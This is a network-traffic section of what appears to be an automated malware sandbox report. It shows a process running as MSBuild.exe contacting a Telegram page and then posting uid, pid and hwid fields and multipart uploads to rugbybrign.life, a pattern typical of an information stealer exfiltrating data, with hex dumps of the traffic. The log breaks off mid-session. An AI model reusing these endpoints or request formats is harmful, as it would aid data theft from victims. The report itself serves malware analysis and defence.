                    Mar 17, 2025 08:20:40.242855072 CET1.1.1.1192.168.2.40xa88No error (0)c.pki.googpki-goog.l.google.comCNAME (Canonical name)IN (0x0001)false
                    Mar 17, 2025 08:20:40.242855072 CET1.1.1.1192.168.2.40xa88No error (0)pki-goog.l.google.com142.250.185.227A (IP address)IN (0x0001)false
                    • t.me
                    • rugbybrign.life
                    • c.pki.goog
                    Session IDSource IPSource PortDestination IPDestination Port
                    0192.168.2.449727142.250.186.6780
                    TimestampBytes transferredDirectionData
                    Mar 17, 2025 08:20:27.378354073 CET202OUTGET /r/gsr1.crl HTTP/1.1
                    Cache-Control: max-age = 3000
                    Connection: Keep-Alive
                    Accept: */*
                    If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT
                    User-Agent: Microsoft-CryptoAPI/10.0
                    Host: c.pki.goog
                    Mar 17, 2025 08:20:27.992652893 CET222INHTTP/1.1 304 Not Modified
                    Date: Mon, 17 Mar 2025 07:16:02 GMT
                    Expires: Mon, 17 Mar 2025 08:06:02 GMT
                    Age: 265
                    Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT
                    Cache-Control: public, max-age=3000
                    Vary: Accept-Encoding
                    Mar 17, 2025 08:20:28.001986980 CET200OUTGET /r/r4.crl HTTP/1.1
                    Cache-Control: max-age = 3000
                    Connection: Keep-Alive
                    Accept: */*
                    If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
                    User-Agent: Microsoft-CryptoAPI/10.0
                    Host: c.pki.goog
                    Mar 17, 2025 08:20:28.180813074 CET222INHTTP/1.1 304 Not Modified
                    Date: Mon, 17 Mar 2025 07:16:02 GMT
                    Expires: Mon, 17 Mar 2025 08:06:02 GMT
                    Age: 266
                    Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                    Cache-Control: public, max-age=3000
                    Vary: Accept-Encoding


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.449711149.154.167.994437892C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2025-03-17 07:20:11 UTC64OUTGET /kz_prokla2 HTTP/1.1
                    Connection: Keep-Alive
                    Host: t.me
                    2025-03-17 07:20:11 UTC512INHTTP/1.1 200 OK
                    Server: nginx/1.18.0
                    Date: Mon, 17 Mar 2025 07:20:11 GMT
                    Content-Type: text/html; charset=utf-8
                    Content-Length: 12373
                    Connection: close
                    Set-Cookie: stel_ssid=3d587a10d3e3b3f194_16505042388067748281; expires=Tue, 18 Mar 2025 07:20:11 GMT; path=/; samesite=None; secure; HttpOnly
                    Pragma: no-cache
                    Cache-control: no-store
                    X-Frame-Options: ALLOW-FROM https://web.telegram.org
                    Content-Security-Policy: frame-ancestors https://web.telegram.org
                    Strict-Transport-Security: max-age=35768000
                    2025-03-17 07:20:11 UTC12373INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 7a 5f 70 72 6f 6b 6c 61 32 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61
                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @kz_prokla2</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.pa


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.449712104.21.32.14437892C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2025-03-17 07:20:11 UTC266OUTPOST /gKAozj HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 65
                    Host: rugbybrign.life
                    2025-03-17 07:20:11 UTC65OUTData Raw: 75 69 64 3d 65 63 37 62 63 66 66 66 64 62 35 34 39 35 37 37 35 30 62 30 63 35 61 31 35 31 64 32 61 37 34 39 61 30 31 31 36 35 30 65 34 64 32 64 64 36 61 61 30 65 61 34 63 39 61 63 26 63 69 64 3d
                    Data Ascii: uid=ec7bcfffdb54957750b0c5a151d2a749a011650e4d2dd6aa0ea4c9ac&cid=
                    2025-03-17 07:20:12 UTC788INHTTP/1.1 200 OK
                    Date: Mon, 17 Mar 2025 07:20:12 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 14134
                    Connection: close
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DOzVXpmu5V1%2Fkxlu8cVcylbqTFGnYpvgoB1yDUlTm31VV88%2BZRFahWH71%2Fg%2BFWdCO4OiKEORokzXAmBkxB%2F25rLefTWYedwvLdbE58bDNeU%2F0QIZFgaUazG6G9bSbO892m4%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 921ab9f34d81d826-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1641&rtt_var=621&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=967&delivery_rate=1752701&cwnd=103&unsent_bytes=0&cid=55a68ca7852002e3&ts=433&x=0"
                    2025-03-17 07:20:12 UTC1369INData Raw: 2c 4b 45 7b e2 15 ab 93 ca 5f b1 50 03 4b 94 e8 e3 ec c8 2f 96 ac ca 0e d9 93 d6 94 8a 12 97 c3 85 e6 f3 dc 22 02 89 d8 60 0a 3d 7f 0e 11 8a 0c b7 82 2d 98 0d b9 dc 37 09 7e 42 c2 0e 40 55 b6 ff 81 19 55 cd 23 6e 31 a7 71 3a 21 6b c8 d3 18 28 ef 8b e6 b2 c0 57 f0 af 3c 76 b6 36 d6 a7 ad 17 aa 22 0f 97 64 5e 4a c4 98 79 84 ad f1 b2 9f 58 90 f6 0d 54 7a 99 4c d7 1b 4d 04 01 30 5b a4 ba 34 c4 b1 ff a2 a8 fd cd a3 8b 8e 51 06 17 b3 c3 97 61 5c bb db a4 09 76 2e df 16 f1 ce c8 68 e5 35 cb 59 e2 24 86 93 3b ed 9d f4 6b 8d 21 d2 ff 57 d5 6c e5 63 c2 bb 58 b7 1c 47 ed 36 d2 f1 70 d9 62 87 be 5b 9a 43 5f 4e c9 08 3f 6a 4c af 87 9c 37 5d 84 bc ef ab 96 85 d2 1f d1 f1 8d 2d 56 28 24 7b 34 94 80 61 b6 a6 45 7b d7 9c 02 1d df 93 3a ff b2 1e 1b 93 4c ea 3a c1 79 b9 a8
                    Data Ascii: ,KE{_PK/"`=-7~B@UU#n1q:!k(W<v6"d^JyXTzLM0[4Qa\v.h5Y$;k!WlcXG6pb[C_N?jL7]-V(${4aE{:L:y
                    2025-03-17 07:20:12 UTC1369INData Raw: 18 9d ad d2 c6 69 ba 3e 89 2c 49 cc 21 27 db 42 83 bf f4 9d 2b 27 9a ab a5 f9 eb 4a 41 29 2e 10 de c8 98 a4 42 34 9a c5 b8 73 38 e2 1f 78 7a 3c 7d 09 2d fa ce 51 68 ff 8f 18 26 04 1b 32 7b 01 59 e1 6f c8 e2 67 74 24 38 3d e4 b1 12 1e 1a 38 a5 19 7c ef 60 54 3b 66 2c e6 dc 11 bc dd 6f 31 63 d8 da a8 34 c2 a5 27 f7 0c c8 2e cd c9 42 57 ec 4e be 55 02 21 54 42 da 33 d5 15 96 04 e6 55 8e c6 f1 97 64 c1 4a d0 26 54 44 8d 71 e0 e8 b2 ec 97 7e d1 de ca f0 7b e8 f8 3f 52 27 60 2a c5 b5 61 2c d1 fc 6c eb c1 2d 1d c6 99 a3 07 26 d4 d5 b9 34 ea 6b 65 16 0e 9d 40 d6 56 2e f6 f9 c6 06 48 23 97 77 43 b1 5e a9 f9 db 7c 63 89 24 4e 80 50 24 31 2d f1 b9 1e 43 e6 73 a0 dc 0c 95 c2 38 6c c5 46 b7 22 99 1e a6 1f 6b 39 80 80 01 65 44 9e df 83 01 8e ed 64 32 ce e7 4e 7d 08 be
                    Data Ascii: i>,I!'B+'JA).B4s8xz<}-Qh&2{Yogt$8=8|`T;f,o1c4'.BWNU!TB3UdJ&TDq~{?R'`*a,l-&4ke@V.H#wC^|c$NP$1-Cs8lF"k9eDd2N}
                    2025-03-17 07:20:12 UTC1369INData Raw: 66 49 87 51 96 fd c2 13 1f 57 c6 95 72 1d 5e f9 ec 6d 1c 47 48 1d 54 0f 49 5a 80 8c 8d ab a3 8f eb df 37 78 f0 7f 4e 5e a2 de 08 37 dd 29 ca 33 39 2c 39 20 df 97 e3 22 50 0d b6 22 8a e8 07 00 c7 91 38 9b 49 6e 1a 90 db d7 1f 89 44 df 2f d3 73 fa 2d 38 1e ed 08 d8 ef a4 a8 be 70 59 e7 79 e0 d3 61 e4 21 7e 84 de f4 90 6c 5b 56 5c c8 e6 cd 6d 87 5a 7f cb 97 e5 96 98 20 07 b5 d0 04 cb 68 c6 05 c5 a7 c0 ef 03 9b 66 1b dd d3 37 52 98 68 90 2e 95 51 0c 9b 72 98 44 e4 f7 ed 33 5c 01 09 33 fa 6a 96 7a 6a 17 6e 09 51 4a 15 0a 65 cd 20 6f 8b db 92 5f 48 f4 56 ee c2 01 05 4a fd dd ca 50 d6 5b 78 0b 1f 1e d2 c2 9e 6a 44 40 f9 9b b3 de df 67 05 b0 db 44 74 b7 7a eb dd 7e 03 47 a0 3a ec 8d 55 3d af 6a 5a 98 00 5d 81 58 b8 0b 14 57 56 66 e7 8a e4 df a7 7f 5d f5 2c 5f 81
                    Data Ascii: fIQWr^mGHTIZ7xN^7)39,9 "P"8InD/s-8pYya!~l[V\mZ hf7Rh.QrD3\3jzjnQJe o_HVJP[xjD@gDtz~G:U=jZ]XWVf],_
                    2025-03-17 07:20:12 UTC1369INData Raw: 0f db 57 fa 66 d6 5c 3c f5 ed 33 e0 1a 2e cd 1c bb f0 a1 99 62 cd a6 97 07 b1 9c 5e 95 54 3a 58 68 8e 50 7a ae 41 c5 bd 88 fb 6f 3c 3e 05 96 ff 0b 56 7d 97 45 2d 0f 10 2c 1c 83 f5 f4 73 b6 44 2a 90 41 6d 84 17 04 60 32 4b c9 f7 82 e0 dd 60 e9 33 5a ed 62 26 ac 05 a4 7d 3d 2b ef fe 5f 02 7d f4 32 7a fb f9 d2 06 8d 30 e4 25 4e 2d 78 ea c9 66 e5 a9 7e 04 15 b7 e8 8b 38 37 83 49 b2 b8 2e f1 4d ed d9 4e 34 b1 d1 13 4c 47 d5 f7 14 90 d9 e5 ab 43 ce 03 40 c7 60 e2 de fe 36 66 0a 04 9f 8e 52 65 8f 5e 52 eb 1c bb 88 d7 94 dc 56 f1 80 a2 f9 a6 27 0f 28 fd 00 54 bb 30 3c bc 69 0c 98 49 44 47 7f 23 6b 43 e5 a1 44 1b d6 30 45 17 0c 88 18 be 22 ba 1e ad e2 bd 08 28 00 e7 a3 20 8a 85 05 0f c9 1e 61 c5 11 b9 1e ca 24 4f c1 18 65 8f 08 3a 20 d6 5e 3e 3f ed b4 85 c4 e2 5e
                    Data Ascii: Wf\<3.b^T:XhPzAo<>V}E-,sD*Am`2K`3Zb&}=+_}2z0%N-xf~87I.MN4LGC@`6fRe^RV'(T0<iIDG#kCD0E"( a$Oe: ^>?^
                    2025-03-17 07:20:12 UTC1369INData Raw: 7d 84 3c a6 2f 39 b9 3b 34 4a ac f9 e4 a0 5c d1 14 12 ac 3e 9e b4 b5 94 3c 36 19 7c 62 ff ad a0 01 79 e7 cc 9c 8e 6a 5a 02 51 bb 07 ec db d2 3f b1 86 df 42 ef 6f b6 c0 f1 b3 2f cc 28 6f 9d 14 cd e8 52 30 94 d2 b4 ad 5a f6 80 ef 20 94 0a 90 fb 90 8e b5 e5 7e 6b 94 36 fd 5b 2a 31 f2 6d eb 93 05 b0 63 b7 1e 57 5e fb 38 40 fc 60 ba dc da da 40 ef c8 2d 6b aa 35 be ac dd bb 72 52 19 c4 1c 40 c4 d4 2d 72 7a 24 6b 60 f0 13 d8 db f1 07 7a fd 44 e8 60 b7 b5 de 07 17 23 88 08 a5 6d cc d2 d6 51 6c 33 1f b9 19 d1 2d 79 5e 5e 36 c6 fe 56 85 df 0f 0b a7 58 60 be 72 cf de 5f bd 6e 64 ff 5a b4 a2 9d d9 f4 21 9a 07 a6 d7 77 b5 00 5c 13 79 72 ff fa e0 8b 14 49 cc 89 49 7e 6d 5a be fe 0c e1 b2 7e 05 28 91 d5 3c 0e c4 b8 a5 d7 23 e1 a7 3b 10 f7 49 8c 0c ea ba 58 f6 18 24 32
                    Data Ascii: }</9;4J\><6|byjZQ?Bo/(oR0Z ~k6[*1mcW^8@`@-k5rR@-rz$k`zD`#mQl3-y^^6VX`r_ndZ!w\yrII~mZ~(<#;IX$2
                    2025-03-17 07:20:12 UTC1369INData Raw: 46 c4 5a c5 d4 0f ad 8a 19 59 1e 0c d8 9f 84 ec 64 98 70 ed 38 5d 91 ba 15 6e 7e 4c d8 cf 6f 8b 82 19 63 bd a3 ab 0e 93 d4 1f 90 97 c8 6c fe d0 97 70 85 a4 65 28 0b 8b b7 b8 76 c1 e7 50 45 c8 42 13 af 06 4f fc 36 a8 a4 a5 5f 5b 9d 74 88 47 18 b9 92 e6 8b f3 7b c0 fe 32 42 8a 4e d6 e7 95 5b f9 4a 38 2d 01 3c 04 df 85 e8 ee 32 69 76 c5 15 2c b4 04 98 5c 20 af 68 5c aa bc a8 8e b0 c6 9e 75 ae 7b 72 c3 35 97 ed d0 17 73 ab 2c e6 8e af fc f3 e9 2e 9e d7 7c bd 01 32 29 2e dc d7 78 96 f4 11 f3 91 b3 08 30 f5 71 35 b4 20 46 4f 87 9a 2c ef 95 7b 20 f1 52 0e 85 89 32 c8 dd d6 23 80 46 12 3b 16 8a 2e 6b e2 2e e8 b5 6e e4 e7 0e 19 d5 22 a6 10 6d 9c 18 ef dc fc bd ef 42 df dd be df 21 ff 84 e1 b9 d7 8a 95 00 6b 63 69 2a c9 bd 3e 8d 89 2e f8 33 d6 41 ff 2d d5 64 ff 9e
                    Data Ascii: FZYdp8]n~Loclpe(vPEBO6_[tG{2BN[J8-<2iv,\ h\u{r5s,.|2).x0q5 FO,{ R2#F;.k.n"mB!kci*>.3A-d
                    2025-03-17 07:20:12 UTC1369INData Raw: 84 e5 4e 6c 09 c6 ed fb 9f a7 8e 6f 02 7e c8 88 56 9c c9 06 da 50 ca 66 23 e8 ae 9f 50 b9 9f 32 a3 97 ef dc 86 60 dc 3f 1f 27 22 32 d8 8e 80 ef 23 85 36 57 7b 23 32 8b cb a5 a3 5c d0 1e 49 28 9b 2b ff 4a 4b c9 f8 da f0 17 85 a2 6e 99 ad dc bf 26 e6 ae 30 1c 97 90 75 d0 0c 67 1b 72 cc c5 1d 07 dd 83 6c 27 10 a1 4a c0 31 7a 35 5f fd fe bc a6 8c 29 3e ba 01 26 e6 3f 91 0f d6 71 ff c6 28 88 74 13 fb b9 15 e0 80 aa cd 27 ba 2f a8 3e 0b c5 0e 79 11 04 66 56 ab b1 7a 33 a1 e0 5d dc 42 ba f2 52 ed e0 23 ce da 36 51 99 0b 44 bc 06 8d be 57 e4 ea 7d 2f b3 c4 45 ea af 88 fd 15 35 76 e8 ec 80 8e 31 d0 79 f3 b7 00 ba 40 d7 ee c0 3c 41 29 8a 09 af 84 ab 77 d6 39 3a 7f c4 1a 28 ac d4 3a 24 a7 71 1f 48 8f 64 74 84 7a bc 54 3a 11 d5 5d 82 7d 76 e4 15 88 b3 97 aa 0d 5a 04
                    Data Ascii: Nlo~VPf#P2`?'"2#6W{#2\I(+JKn&0ugrl'J1z5_)>&?q(t'/>yfVz3]BR#6QDW}/E5v1y@<A)w9:(:$qHdtzT:]}vZ
                    2025-03-17 07:20:12 UTC1369INData Raw: 8b 54 68 cc 0a 1e 05 98 94 c9 24 6b 82 eb 68 47 52 ec 55 9a e3 13 db 74 c5 38 4a 8d b9 ba 01 0f 18 d9 40 46 3b ae 4d 3b 6e 6e 5f 4d 3c d7 ff 15 99 e8 d6 82 34 88 81 c0 1b d2 50 ce 9d 5a 11 0e 0d 64 09 e2 1e 9b 05 e3 b0 02 72 47 b3 96 49 7b f2 88 4b 99 7c fa 48 fe 95 18 f1 2c 78 c1 e5 7e d4 06 2c 8a d1 69 be 55 f1 b1 81 75 7a 59 18 24 9e 4c 88 b6 f4 8f 4e 3f 9f 3a c2 5a db 62 03 76 c2 39 2a 6c b4 16 65 35 82 44 7e b6 39 9a f6 af c9 86 a7 f7 0b 5a 74 b9 56 eb c0 42 d3 02 f1 0b 63 72 43 5f 15 54 f0 54 89 28 9c 26 b9 0a 9f 0c a6 c8 14 21 79 7a 90 e2 fb 2d f7 13 6d ea 03 1d 18 e6 da 3d 73 e4 cd c3 a6 1b 29 ca 49 6e a9 c6 d9 89 57 ca 3a 71 00 d5 f0 fa 88 ce 5b 14 c5 35 dd 81 ed 68 03 b7 e7 9a ed c8 28 a3 ab 43 08 d5 f4 42 5e 08 93 96 ce 25 07 96 b0 de 00 40 03
                    Data Ascii: Th$khGRUt8J@F;M;nn_M<4PZdrGI{K|H,x~,iUuzY$LN?:Zbv9*le5D~9ZtVBcrC_TT(&!yz-m=s)InW:q[5h(CB^%@
                    2025-03-17 07:20:12 UTC1369INData Raw: 5c 5d 10 c6 a2 c6 77 93 fb 4b bc 18 9f 66 f1 17 0d c7 d5 7e e3 23 55 e1 77 b0 66 e1 ad 88 ca 67 1f 33 85 97 9c 42 46 b2 6a e2 e8 3f f8 c4 f9 91 6a b5 6d 0b 16 c0 ba 8b 3a 35 51 ca f9 2f 4a f1 2e 5c 9a 19 65 9b ce ee 03 65 4b bb 66 e2 49 fd a9 27 e4 ea 9e 92 95 a9 6a c1 41 ab 02 00 10 a0 c8 1e d4 3a 45 aa f3 41 8b e9 ce 60 54 8d 2a cd a4 85 bd 93 db 25 d2 7a a1 de 54 0b 95 f2 3c 6e 30 31 f1 40 c5 8f 0e 8a 87 d3 ab 11 3c bb 34 69 3a 3c 8d 2d 18 77 bf dc e5 b6 c4 99 67 e6 c2 d0 a9 52 5e 1a da ae 40 b0 85 8e 79 a5 f3 7a 67 40 d8 ff a6 f7 36 db aa 99 05 ee d6 fe bb e8 38 c5 ac b7 e2 45 a5 96 aa 3c 4f df 52 a6 6c b0 00 89 83 be 33 ac 27 94 2a cb b6 32 65 c0 ce 2c 69 18 48 78 2a cb 8a a3 1a 0a 1b 56 34 39 e4 6a 15 48 77 b8 5d 48 52 e1 c0 50 5b d0 e2 73 3f 9b 0d
                    Data Ascii: \]wKf~#Uwfg3BFj?jm:5Q/J.\eeKfI'jA:EA`T*%zT<n01@<4i:<-wgR^@yzg@68E<ORl3'*2e,iHx*V49jHw]HRP[s?


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.449713104.21.32.14437892C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2025-03-17 07:20:13 UTC276OUTPOST /gKAozj HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: multipart/form-data; boundary=foOk5zS2H2
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 19595
                    Host: rugbybrign.life
                    2025-03-17 07:20:13 UTC15331OUTData Raw: 2d 2d 66 6f 4f 6b 35 7a 53 32 48 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 65 63 37 62 63 66 66 66 64 62 35 34 39 35 37 37 35 30 62 30 63 35 61 31 35 31 64 32 61 37 34 39 61 30 31 31 36 35 30 65 34 64 32 64 64 36 61 61 30 65 61 34 63 39 61 63 0d 0a 2d 2d 66 6f 4f 6b 35 7a 53 32 48 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 66 6f 4f 6b 35 7a 53 32 48 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 30 34 33 35 45 39 38 31 32 32 42 46
                    Data Ascii: --foOk5zS2H2Content-Disposition: form-data; name="uid"ec7bcfffdb54957750b0c5a151d2a749a011650e4d2dd6aa0ea4c9ac--foOk5zS2H2Content-Disposition: form-data; name="pid"2--foOk5zS2H2Content-Disposition: form-data; name="hwid"40435E98122BF
                    2025-03-17 07:20:13 UTC4264OUTData Raw: 63 aa d7 d5 fe 30 57 7c e5 58 f9 2c f2 42 14 a8 77 3d 38 8b 5c 4a e9 28 df 8f a1 ea 94 0d c8 91 9a d2 6c 6d ca 7f 90 59 37 d1 69 ff 96 51 3b 97 ab 92 34 7b 4f b4 41 42 c1 45 d4 94 b2 ab b4 35 53 6e c2 8f f3 69 c2 4b 4d 47 bf 6f f2 21 ef 34 b1 b8 fd 70 60 e7 f8 3b 2e c0 16 02 21 21 bf 48 47 d5 90 66 81 3d 7d 9a ba 36 b6 fa 5a 06 b5 e6 01 4d 9e d6 f8 2d 45 63 f6 b8 0c 8c 00 93 ec 23 8f 00 5d ff 8b ec 7e f6 f6 51 ec 62 41 34 60 ec dd c0 a6 ca bb 98 0f 93 88 bb f5 c6 0f fc e3 e9 78 42 da f6 69 14 31 a0 8c d6 1b 84 7f e3 48 2a 40 2c 87 f2 bc 68 f3 31 15 8f 11 a8 3b 25 35 52 3b 24 8d ec eb ee c7 52 8a 9a 10 cb c5 17 15 e8 91 32 4b 13 86 db b0 83 ea b1 d1 0e 14 49 18 1a 86 3b d3 6b 52 50 27 e5 a8 87 34 09 4e 0f 58 0d 65 52 38 25 2a fa 4e 55 a9 26 7e 1a 92 32 b0
                    Data Ascii: c0W|X,Bw=8\J(lmY7iQ;4{OABE5SniKMGo!4p`;.!!HGf=}6ZM-Ec#]~QbA4`xBi1H*@,h1;%5R;$R2KI;kRP'4NXeR8%*NU&~2
                    2025-03-17 07:20:13 UTC272INHTTP/1.1 200 OK
                    Date: Mon, 17 Mar 2025 07:20:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Server: cloudflare
                    Vary: Accept-Encoding
                    Cf-Cache-Status: DYNAMIC
                    CF-RAY: 921ab9fa8bb08cb3-EWR
                    alt-svc: h3=":443"; ma=86400
                    2025-03-17 07:20:13 UTC74INData Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d 7d 0d 0a
                    Data Ascii: 44{"success":{"message":"message success delivery from 8.46.123.189"}}
                    2025-03-17 07:20:13 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.449714104.21.32.14437892C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2025-03-17 07:20:14 UTC276OUTPOST /gKAozj HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: multipart/form-data; boundary=wD1czjs8ALd
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8757
                    Host: rugbybrign.life
                    2025-03-17 07:20:14 UTC8757OUTData Raw: 2d 2d 77 44 31 63 7a 6a 73 38 41 4c 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 65 63 37 62 63 66 66 66 64 62 35 34 39 35 37 37 35 30 62 30 63 35 61 31 35 31 64 32 61 37 34 39 61 30 31 31 36 35 30 65 34 64 32 64 64 36 61 61 30 65 61 34 63 39 61 63 0d 0a 2d 2d 77 44 31 63 7a 6a 73 38 41 4c 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 77 44 31 63 7a 6a 73 38 41 4c 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 30 34 33 35 45 39 38 31 32
                    Data Ascii: --wD1czjs8ALdContent-Disposition: form-data; name="uid"ec7bcfffdb54957750b0c5a151d2a749a011650e4d2dd6aa0ea4c9ac--wD1czjs8ALdContent-Disposition: form-data; name="pid"2--wD1czjs8ALdContent-Disposition: form-data; name="hwid"40435E9812
                    2025-03-17 07:20:14 UTC818INHTTP/1.1 200 OK
                    Date: Mon, 17 Mar 2025 07:20:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yybbA%2FQRjZ8r%2BhPbuDowhGpmVEFdRGzz8NrVaN80JU7N2Wym%2B4JOqmDAbhb3Il%2BkX%2FXm2hE1VbgeEcUqjM1sIT%2BfJTeuSnxAyt121HeGidjerywAs93pgDZgVEMZgWX8t8A%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 921aba00fc2e7611-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=2070&min_rtt=2062&rtt_var=790&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2837&recv_bytes=9691&delivery_rate=1370892&cwnd=106&unsent_bytes=0&cid=2b1ae77c11bbfa58&ts=494&x=0"
                    2025-03-17 07:20:14 UTC74INData Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d 7d 0d 0a
                    Data Ascii: 44{"success":{"message":"message success delivery from 8.46.123.189"}}
                    2025-03-17 07:20:14 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.449717104.21.32.14437892C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2025-03-17 07:20:15 UTC280OUTPOST /gKAozj HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: multipart/form-data; boundary=55KO06ke0lhRlx
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 20425
                    Host: rugbybrign.life
